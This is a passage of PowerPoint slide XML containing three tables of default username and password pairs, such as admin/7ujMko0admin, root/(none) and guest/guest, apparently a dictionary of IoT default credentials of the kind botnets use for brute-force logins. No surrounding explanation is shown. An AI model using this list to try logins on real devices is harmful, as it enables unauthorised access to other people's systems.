                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1140379537"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1111111</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1339001674"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1234</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="268160318"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>12345</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1211926384"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>123456</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="731749972"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>54321</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3308989046"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>7ujMko0admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2980533267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3299720615"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin1234</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="330493429"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E19E5291-B1EE-464E-93E1-4928EE6CB798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2777863294"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4519390" y="1825625"/>
          <a:ext cx="3153220" cy="4820920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1514348">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2869161968"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1638872">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="865460026"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2632789603"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>meinsm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="862709429"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>pass</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3216466159"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3712119862"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>smcadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3526276122"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1512014683"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>administrator</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1234</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1235950801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>administrator</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2597372424"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>guest</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>12345</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2458999079"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>guest</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>guest</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3495203342"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" i="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(none)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2777646234"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>00000000</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1652618878"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1111</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1323067941"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B10EE0-ACC9-4B26-978A-8BD95537DF8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41520288"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8200580" y="1825625"/>
          <a:ext cx="3153220" cy="4820920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1514348">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2869161968"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1638872">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="865460026"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2632789603"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1234</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2451307453"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>12345</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1179528652"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>123456</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
